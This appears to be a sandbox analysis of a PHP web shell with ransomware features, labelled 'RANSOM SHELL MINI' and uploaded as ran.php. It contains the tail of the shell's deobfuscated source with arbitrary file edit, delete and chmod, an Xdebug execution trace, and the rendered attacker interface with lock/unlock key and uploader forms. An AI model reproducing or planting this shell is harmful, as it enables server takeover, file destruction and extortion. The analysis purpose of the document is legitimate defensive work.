fopen($_POST[\'path\'],\'w\');\r\nif(fwrite($fp,$_POST[\'src\'])){\r\necho \'<font color="#5ddcfc">Berhasil Edit File</font><br/>\';\r\n}else{\r\necho \'<font color="#9435dd">Gagal Edit File</font><br/>\';\r\n}\r\nfclose($fp);\r\n}\r\necho \'<form method="POST">\r\n<center><textarea style="width: 700px;height: 300px;" name="src"> \'.htmlspecialchars(file_get_contents($_POST[\'path\'])).\'</textarea></center><br />\r\n<input type="hidden" name="path" value="\'.$_POST[\'path\'].\'">\r\n<input type="hidden" name="opt" value="edit">\r\n<input type="submit" value="Simpan" />\r\n</form>\';\r\n}\r\necho \'</center>\';\r\n}else{\r\necho \'</table><br/><center>\';\r\nif(isset($_GET[\'option\']) && $_POST[\'opt\'] == \'delete\'){\r\nif($_POST[\'type\'] == \'dir\'){\r\nif(rmdir($_POST[\'path\'])){\r\necho \'<font color="#5ddcfc">Directory Berhasil Terhapus</font><br/>\';\r\n}else{\r\necho \'<font color="#9435dd">Directory Gagal Terhapus </font><br/>\';\r\n}\r\n}elseif($_POST[\'type\'] == \'file\'){\r\nif(unlink($_POST[\'path\'])){\r\necho \'<font color="#5ddcfc">File Berhasil Terhapus</font><br/>\';\r\n}else{\r\necho \'<font color="#9435dd">File Gagal Dihapus</font><br/>\';\r\n}\r\n}\r\n}\r\necho \'</center>\';\r\n$scandir = scandir($path);\r\necho \'<div id="content"><table width="700" border="0" cellpadding="4" cellspacing="1" align="center">\r\n<tr class="first">\r\n<td><center>Name</peller></center></td>\r\n<td><center>Size</peller></center></td>\r\n<td><center>Permission</peller></center></td>\r\n<td><center>Modify</peller></center></td>\r\n</tr>\';\r\n\r\nforeach($scandir as $dir){\r\nif(!is_dir($path.\'/\'.$dir) || $dir == \'.\' || $dir == \'..\') continue;\r\necho \'<tr>\r\n<td><a href="?path=\'.$path.\'/\'.$dir.\'">\'.$dir.\'</a></td>\r\n<td><center>----</center></td>\r\n<td><center>\';\r\nif(is_writable($path.\'/\'.$dir)) echo \'<font color=" #00edff">\';\r\nelseif(!is_readable($path.\'/\'.$dir)) echo \'<font color="red">\';\r\necho perms($path.\'/\'.$dir);\r\nif(is_writable($path.\'/\'.$dir) || !is_readable($path.\'/\'.$dir)) echo \'</font>\';\r\n\r\necho \'</center></td>\r\n<td><center><form method="POST" action="?option&path=\'.$path.\'">\r\n<select name="opt">\r\n<option value="">Select</option>\r\n<option value="delete">Delete</option>\r\n<option value="chmod">Chmod</option>\r\n<option value="rename">Rename</option>\r\n</select>\r\n<input type="hidden" name="type" value="dir">\r\n<input type="hidden" name="name" value="\'.$dir.\'">\r\n<input type="hidden" name="path" value="\'.$path.\'/\'.$dir.\'">\r\n<input type="submit" value=">">\r\n</form></center></td>\r\n</tr>\';\r\n}\r\necho \'<tr class="first"><td></td><td></td><td></td><td></td></tr>\';\r\nforeach($scandir as $file){\r\nif(!is_file($path.\'/\'.$file)) continue;\r\n$size = filesize($path.\'/\'.$file)/1024;\r\n$size = round($size,3);\r\nif($size >= 1024){\r\n$size = round($size/1024,2).\' MB\';\r\n}else{\r\n$size = $size.\' KB\';\r\n}\r\n\r\necho \'<tr>\r\n<td><a href="?filesrc=\'.$path.\'/\'.$file.\'&path=\'.$path.\'">\'.$file.\'</a></td>\r\n<td><center>\'.$size.\'</center></td>\r\n<td><center>\';\r\nif(is_writable($path.\'/\'.$file)) echo \'<font color=" #00edff">\';\r\nelseif(!is_readable($path.\'/\'.$file)) echo \'<font color="red">\';\r\necho perms($path.\'/\'.$file);\r\nif(is_writable($path.\'/\'.$file) || !is_readable($path.\'/\'.$file)) echo \'</font>\';\r\necho \'</center></td>\r\n<td><center><form method="POST" action="?option&path=\'.$path.\'">\r\n<select name="opt">\r\n<option value="">Select</option>\r\n<option value="delete">Delete</option>\r\n<option value="chmod">Chmod</option>\r\n<option value="rename">Rename</option>\r\n<option value="edit">Edit</option>\r\n</select>\r\n<input type="hidden" name="type" value="file">\r\n<input type="hidden" name="name" value="\'.$file.\'">\r\n<input type="hidden" name="path" value="\'.$path.\'/\'.$file.\'">\r\n<input type="submit" value=">">\r\n</form></center></td>\r\n</tr>\';\r\n}\r\necho \'</table>\r\n</div>\';\r\n}\r\necho \'<center><br/> </center>\r\n<center><font color="red" face="Courgette" size="4">Copyright © 2019 <font color="#9435dd">BLACK PHANTOM CYBER</font></center>\r\n<body>\r\n\t\r\n\t<iframe width="0" height="0" src="https://k.top4top.net/m_12407hbmd0.mp3" frameborder="0" allowfullscreen></iframe>\r\n\t\r\n</body>\r\n</html>\';\r\nfunction perms($file){\r\n$perms = fileperms($file);\r\n\r\nif (($perms & 0xC000) == 0xC000) {\r\n// Socket\r\n$info = \'s\';\r\n} elseif (($perms & 0xA000) == 0xA000) {\r\n// Symbolic Link\r\n$info = \'l\';\r\n} elseif (($perms & 0x8000) == 0x8000) {\r\n// Regular\r\n$info = \'-\';\r\n} elseif (($perms & 0x6000) == 0x6000) {\r\n// Block special\r\n$info = \'b\';\r\n} elseif (($perms & 0x4000) == 0x4000) {\r\n// Directory\r\n$info = \'d\';\r\n} elseif (($perms & 0x2000) == 0x2000) {\r\n// Character special\r\n$info = \'c\';\r\n} elseif (($perms & 0x1000) == 0x1000) {\r\n// FIFO pipe\r\n$info = \'p\';\r\n} else {\r\n// Unknown\r\n$info = \'u\';\r\n}\r\n\r\n// Owner\r\n$info .= (($perms & 0x0100) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0080) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0040) ?\r\n(($perms & 0x0800) ? \'s\' : \'x\' ) :\r\n(($perms & 0x0800) ? \'S\' : \'-\'));\r\n\r\n// Group\r\n$info .= (($perms & 0x0020) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0010) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0008) ?\r\n(($perms & 0x0400) ? \'s\' : \'x\' ) :\r\n(($perms & 0x0400) ? \'S\' : \'-\'));\r\n\r\n// World\r\n$info .= (($perms & 0x0004) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0002) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0001) ?\r\n(($perms & 0x0200) ? \'t\' : \'x\' ) :\r\n(($perms & 0x0200) ? \'T\' : \'-\'));\r\n\r\nreturn $info;\r\n}\r\n?>' /var/www/html/uploads/ran.php(10) : eval()'d code 1 0
4 16 0 0.004075 567832 error_reporting 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 38 1 0
4 16 1 0.004092 567872
4 16 R 22527
4 17 0 0.004106 567832 set_time_limit 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 39 1 0
4 17 1 0.004123 567896
4 17 R FALSE
4 18 0 0.004137 567864 ini_set 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 40 2 'memory_limit' '-1'
4 18 1 0.004153 567968
4 18 R '128M'
3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 246 $files = NULL
4 19 0 0.004189 567976 error_reporting 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 380 1 0
4 19 1 0.004204 568016
4 19 R 0
4 20 0 0.004217 567976 set_time_limit 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 381 1 0
4 20 1 0.004232 568008
4 20 R FALSE
4 21 0 0.004245 567976 get_magic_quotes_gpc 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 383 0
4 21 1 0.004258 567976
4 21 R FALSE
4 22 0 0.004271 567976 getcwd 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 448 0
4 22 1 0.004286 568024
4 22 R '/var/www/html/uploads'
3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 448 $path = '/var/www/html/uploads'
4 23 0 0.004312 568024 str_replace 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 450 3 '\\' '/' '/var/www/html/uploads'
4 23 1 0.004329 568120
4 23 R '/var/www/html/uploads'
3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 450 $path = '/var/www/html/uploads'
4 24 0 0.004355 568024 explode 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 451 2 '/' '/var/www/html/uploads'
4 24 1 0.004372 568600
4 24 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 451 $paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 453 $id = 0
3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 455 $a = TRUE
3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 453 $id = 1
3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 461 $i = 0
3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 461 $i++
3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 461 $i++
3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 453 $id = 2
3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 461 $i = 0
3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 461 $i++
3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 461 $i++
3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 461 $i++
3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 453 $id = 3
3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 461 $i = 0
3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 461 $i++
3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 461 $i++
3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 461 $i++
3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 461 $i++
3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 453 $id = 4
3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 461 $i = 0
3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 461 $i++
3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 461 $i++
3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 461 $i++
3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 461 $i++
3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 461 $i++
4 25 0 0.004632 568528 scandir 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 551 1 '/var/www/html/uploads'
4 25 1 0.004665 569144
4 25 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'prepend.php', 5 => 'ran.php']
3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 551 $scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'prepend.php', 5 => 'ran.php']
4 26 0 0.004704 569160 is_dir 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 561 1 '/var/www/html/uploads/.'
4 26 1 0.004721 569224
4 26 R TRUE
4 27 0 0.004735 569192 is_dir 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 561 1 '/var/www/html/uploads/..'
4 27 1 0.004751 569240
4 27 R TRUE
4 28 0 0.004764 569200 is_dir 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 561 1 '/var/www/html/uploads/.htaccess'
4 28 1 0.004780 569240
4 28 R FALSE
4 29 0 0.004794 569200 is_dir 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 561 1 '/var/www/html/uploads/data'
4 29 1 0.004810 569240
4 29 R TRUE
4 30 0 0.004824 569200 is_writable 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 566 1 '/var/www/html/uploads/data'
4 30 1 0.004841 569240
4 30 R TRUE
4 31 0 0.004856 569200 perms 1 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 568 1 '/var/www/html/uploads/data'
5 32 0 0.004869 569200 fileperms 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 633 1 '/var/www/html/uploads/data'
5 32 1 0.004883 569240
5 32 R 16895
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 633 $perms = 16895
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 649 $info = 'd'
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 662 $info .= 'r'
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 663 $info .= 'w'
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 666 $info .= 'x'
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 669 $info .= 'r'
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 670 $info .= 'w'
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 673 $info .= 'x'
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 676 $info .= 'r'
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 677 $info .= 'w'
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 680 $info .= 'x'
4 31 1 0.005019 569240
4 31 R 'drwxrwxrwx'
4 33 0 0.005034 569200 is_writable 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 569 1 '/var/www/html/uploads/data'
4 33 1 0.005051 569240
4 33 R TRUE
4 34 0 0.005066 569208 is_dir 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 561 1 '/var/www/html/uploads/prepend.php'
4 34 1 0.005082 569256
4 34 R FALSE
4 35 0 0.005095 569208 is_dir 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 561 1 '/var/www/html/uploads/ran.php'
4 35 1 0.005111 569240
4 35 R FALSE
4 36 0 0.005125 569192 is_file 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 588 1 '/var/www/html/uploads/.'
4 36 1 0.005141 569224
4 36 R FALSE
4 37 0 0.005154 569192 is_file 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 588 1 '/var/www/html/uploads/..'
4 37 1 0.005169 569240
4 37 R FALSE
4 38 0 0.005182 569200 is_file 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 588 1 '/var/www/html/uploads/.htaccess'
4 38 1 0.005197 569240
4 38 R TRUE
4 39 0 0.005210 569200 filesize 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 589 1 '/var/www/html/uploads/.htaccess'
4 39 1 0.005224 569240
4 39 R 64
3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 589 $size = 0.0625
4 40 0 0.005249 569144 round 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 590 2 0.0625 3
4 40 1 0.005263 569216
4 40 R 0.063
3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 590 $size = 0.063
3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 594 $size = '0.063 KB'
4 41 0 0.005301 569240 is_writable 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 601 1 '/var/www/html/uploads/.htaccess'
4 41 1 0.005318 569280
4 41 R FALSE
4 42 0 0.005331 569240 is_readable 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 602 1 '/var/www/html/uploads/.htaccess'
4 42 1 0.005346 569280
4 42 R TRUE
4 43 0 0.005359 569240 perms 1 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 603 1 '/var/www/html/uploads/.htaccess'
5 44 0 0.005373 569240 fileperms 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 633 1 '/var/www/html/uploads/.htaccess'
5 44 1 0.005386 569280
5 44 R 33188
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 633 $perms = 33188
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 643 $info = '-'
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 662 $info .= 'r'
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 663 $info .= 'w'
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 666 $info .= '-'
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 669 $info .= 'r'
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 670 $info .= '-'
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 673 $info .= '-'
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 676 $info .= 'r'
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 677 $info .= '-'
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 680 $info .= '-'
4 43 1 0.005514 569280
4 43 R '-rw-r--r--'
4 45 0 0.005528 569240 is_writable 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 604 1 '/var/www/html/uploads/.htaccess'
4 45 1 0.005544 569280
4 45 R FALSE
4 46 0 0.005557 569240 is_readable 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 604 1 '/var/www/html/uploads/.htaccess'
4 46 1 0.005573 569280
4 46 R TRUE
4 47 0 0.005587 569240 is_file 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 588 1 '/var/www/html/uploads/data'
4 47 1 0.005603 569280
4 47 R FALSE
4 48 0 0.005617 569248 is_file 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 588 1 '/var/www/html/uploads/prepend.php'
4 48 1 0.005633 569296
4 48 R TRUE
4 49 0 0.005646 569256 filesize 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 589 1 '/var/www/html/uploads/prepend.php'
4 49 1 0.005660 569296
4 49 R 57
3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 589 $size = 0.0556640625
4 50 0 0.005687 569152 round 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 590 2 0.0556640625 3
4 50 1 0.005702 569224
4 50 R 0.056
3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 590 $size = 0.056
3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 594 $size = '0.056 KB'
4 51 0 0.005739 569256 is_writable 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 601 1 '/var/www/html/uploads/prepend.php'
4 51 1 0.005756 569296
4 51 R FALSE
4 52 0 0.005769 569256 is_readable 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 602 1 '/var/www/html/uploads/prepend.php'
4 52 1 0.005785 569296
4 52 R TRUE
4 53 0 0.005798 569256 perms 1 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 603 1 '/var/www/html/uploads/prepend.php'
5 54 0 0.005812 569256 fileperms 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 633 1 '/var/www/html/uploads/prepend.php'
5 54 1 0.005826 569296
5 54 R 33261
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 633 $perms = 33261
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 643 $info = '-'
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 662 $info .= 'r'
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 663 $info .= 'w'
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 666 $info .= 'x'
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 669 $info .= 'r'
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 670 $info .= '-'
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 673 $info .= 'x'
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 676 $info .= 'r'
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 677 $info .= '-'
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 680 $info .= 'x'
4 53 1 0.005954 569296
4 53 R '-rwxr-xr-x'
4 55 0 0.005968 569256 is_writable 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 604 1 '/var/www/html/uploads/prepend.php'
4 55 1 0.005984 569296
4 55 R FALSE
4 56 0 0.005997 569256 is_readable 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 604 1 '/var/www/html/uploads/prepend.php'
4 56 1 0.006013 569296
4 56 R TRUE
4 57 0 0.006163 569248 is_file 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 588 1 '/var/www/html/uploads/ran.php'
4 57 1 0.006180 569280
4 57 R TRUE
4 58 0 0.006194 569240 filesize 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 589 1 '/var/www/html/uploads/ran.php'
4 58 1 0.006209 569280
4 58 R 13921
3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 589 $size = 13.5947265625
4 59 0 0.006235 569144 round 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 590 2 13.5947265625 3
4 59 1 0.006250 569216
4 59 R 13.595
3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 590 $size = 13.595
3 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 594 $size = '13.595 KB'
4 60 0 0.006288 569240 is_writable 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 601 1 '/var/www/html/uploads/ran.php'
4 60 1 0.006305 569280
4 60 R FALSE
4 61 0 0.006319 569240 is_readable 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 602 1 '/var/www/html/uploads/ran.php'
4 61 1 0.006335 569280
4 61 R TRUE
4 62 0 0.006348 569240 perms 1 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 603 1 '/var/www/html/uploads/ran.php'
5 63 0 0.006362 569240 fileperms 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 633 1 '/var/www/html/uploads/ran.php'
5 63 1 0.006376 569280
5 63 R 33204
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 633 $perms = 33204
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 643 $info = '-'
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 662 $info .= 'r'
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 663 $info .= 'w'
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 666 $info .= '-'
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 669 $info .= 'r'
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 670 $info .= 'w'
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 673 $info .= '-'
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 676 $info .= 'r'
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 677 $info .= '-'
4 A /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 680 $info .= '-'
4 62 1 0.006510 569280
4 62 R '-rw-rw-r--'
4 64 0 0.006524 569240 is_writable 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 604 1 '/var/www/html/uploads/ran.php'
4 64 1 0.006541 569280
4 64 R FALSE
4 65 0 0.006554 569240 is_readable 0 /var/www/html/uploads/ran.php(10) : eval()'d code(1) : eval()'d code 604 1 '/var/www/html/uploads/ran.php'
4 65 1 0.006570 569280
4 65 R TRUE
3 15 1 0.006586 569184
2 7 1 0.006598 510632
0.006621 428648
TRACE END [2023-02-13 02:37:46.171670]
Generated HTML code
<html lang="en"><head>
<title>RANSOM SHELL MINI</title>
<style type="text/css">
body {
background: #1A1C1F;
color: #e2e2e2;
}
.inpute{
border-style: dotted;
border-color: #379600;
background-color: transparent;
color: white;
text-align: center;
}
.selecte{
border-style: dotted;
border-color: green;
background-color: transparent;
color: green;
}
.submite{
border-style: dotted;
border-color: #4CAF50;
background-color: transparent;
color: white;
}
.result{
text-align: left;
}
</style>
<link rel="stylesheet" type="text/css" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.6.3/css/font-awesome.min.css">
</head>
<body>
<div class="result">
<center>
<div style="font-size;color:red;">
<pre>@@@@@ @@@@@
@@@@@@@ @@@@@@@
@@@@@@@ @@@@@@@@@@@@@@@ @@@@@@@
@@@@@@@@ @@@@@@@@@@@@@@@@@@@ @@@@@@@@
@@@@@ @@@@@@@@@@@@@@@@@@@@@ @@@@@
@@@@@ @@@@@@@@@@@@@@@@@@@@@@@ @@@@@
@@ @@@@@@@@@@@@@@@@@@@@@@@@@ @@
@@@@@@@ @@@@@@ @@@@@@
@@@@@@ @@@@ @@@@@
@@@@@@ @@@@ @@@@@
@@@@@@ @@@@@@ @@@@@
@@@@@@@@@@@ @@@@@@@@@@
@@@@@@@@@@ @@@@@@@@@
@@ @@@@@@@@@@@@@@@@@ @@
@@@@ @@@@ @ @ @ @ @@@@ @@@@
@@@@@ @@@ @ @ @ @ @@@ @@@@@
@@@@@ @@@@@@@@@@@@@ @@@@@
@@@@ @@@@@@@@@@@ @@@@
@@@@@ @@@@@@@ @@@@@
@@@@@@@ @@@@@@@
@@@@@ @@@@@
-[ Contact : HackerBaloch07@gmail.com ]-
</pre>
<form action="" method="post" style=" text-align: center;">
<label>Key : </label>
<input type="text" name="key" class="inpute" placeholder="Password Key">
<select name="method" class="selecte">
<option value="1">Locked</option>
<option value="2">Unlocked</option>
</select>
<input type="submit" name="submit" class="submite" value="Submit">
</form>
<br>
<hr>
<br><br>
<h2><font color="red" face="iceland"> Uploader</font></h2><font color="red" face="iceland"> </font>
<form method="POST" enctype="multipart/form-data" action=""><input type="file" name="files"><input type="submit" value="Fire!"></form> <br>
</div></center>
</div>
<style>
body {
background-color: black;
}
body {
color: red;
font-size: 100%;
font-weight: bold;
font-family: Courier;
background-color: black;
}
input {
color: red;
color: red;
font-size: 100%;
font-weight: bold;
font-family: Courier;
border: 2px solid red;
border-radius: 4px;
background-color: black;
}
textarea {
color: red;
font-size: 100%;
font-weight: bold;
font-family: Courier;
border: 2px solid red;
border-radius: 4px;
background-color: black;
}
#content tr:hover{
background-color: black;
text-shadow:0px 0px 10px red;
}
#content .first{
background-color: black;
}
a{
color: red;
text-decoration: none;
}
</style>
<div class="heading">
<font><center><h1>Php Obfuscator By 5H311_1NJ3C706</h1></center></font>
</div>
<div class="subheading">
<center> <h3><font>paste your php code inside hit Enter done :P</font></h3></center>
</div>
<div class="input">
<form action="" method="POST">
<center> <textarea rows="9" cols="85" type="text" name="php" placeholder="Input Php Code Here"></textarea><br><br>
</center>
<center> <input type="submit" name="submit" value="Submit"><br>
</center>
</form>
</div>
<div class="footer">
</div>
<link href="" rel="stylesheet" type="text/css">
<title>5H311_1NJ3C706</title>
<style>
body{
font-family: "Courgette", cursive;
background-image: url(" ");
color:red;
background-attachment:fixed;
background-repeat:no-repeat;
background-position:center;
background-color:Black;
-webkit-background-size: 100% 100%;
}
h1{
color:red;
-webkit-text-stroke: 0px #5ddcfc;
}
#content tr:hover{
background-color: #5ddcfc;
text-shadow:1px 1px 0px #000;
}
#content .first{
color:red;
background-color: #5ddcfc;
}
table{
border: 0px #9435dd solid;
}
a{
color:red;
text-decoration: none;
}
a:hover{
color:#9435dd;
text-shadow:0px 1px 0px #000;
}
input,select,textarea{
font-family: Courgette;
background-color:black;
color:#5ddcfc;
border: 1px red solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
</style>
<link href="https://fonts.googleapis.com/css?family=Courgette" rel="stylesheet">
<center>
<h1>CRACKER BY 5H311_1NJ3C706 </h1></center>
<table width="700" border="0" cellpadding="4" cellspacing="1" align="center">
<tbody><tr><td><font color="#5ddcfc">Current Dir :</font> <a href="?path=/">/</a><a href="?path=/var">var</a>/<a href="?path=/var/www">www</a>/<a href="?path=/var/www/html">html</a>/</td></tr><tr><td><form enctype="multipart/form-data" method="POST">
<font color="#5ddcfc">File Upload :</font><input type="file" name="file"><input type="submit" value="upload">
</form>
</td></tr></tbody></table><br><center></center><div id="content"><table width="700" border="0" cellpadding="4" cellspacing="1" align="center">
<tbody><tr class="first">
<td><center>Name</center></td>
<td><center>Size</center></td>
<td><center>Permission</center></td>
<td><center>Modify</center></td>
</tr><tr class="first"><td></td><td></td><td></td><td></td></tr><tr>
<td><a href="?filesrc=/var/www/html/beneri.se_malware_analysis&path=/var/www/html">beneri.se_malware_analysis</a></td>
<td><center>0 KB</center></td>
<td><center>-rw-r--r--</center></td>
<td><center><form method="POST" action="?option&path=/var/www/html">
